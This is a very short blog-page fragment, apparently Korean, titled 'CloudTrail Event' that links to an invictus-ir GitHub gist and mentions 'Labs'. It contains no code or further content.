CloudTrail Event

https://gist.github.com/invictus-ir/06d45ad738e3cc90bc4afa80f6a72c0a

Labs

블로그 이미지

wtdsoul

,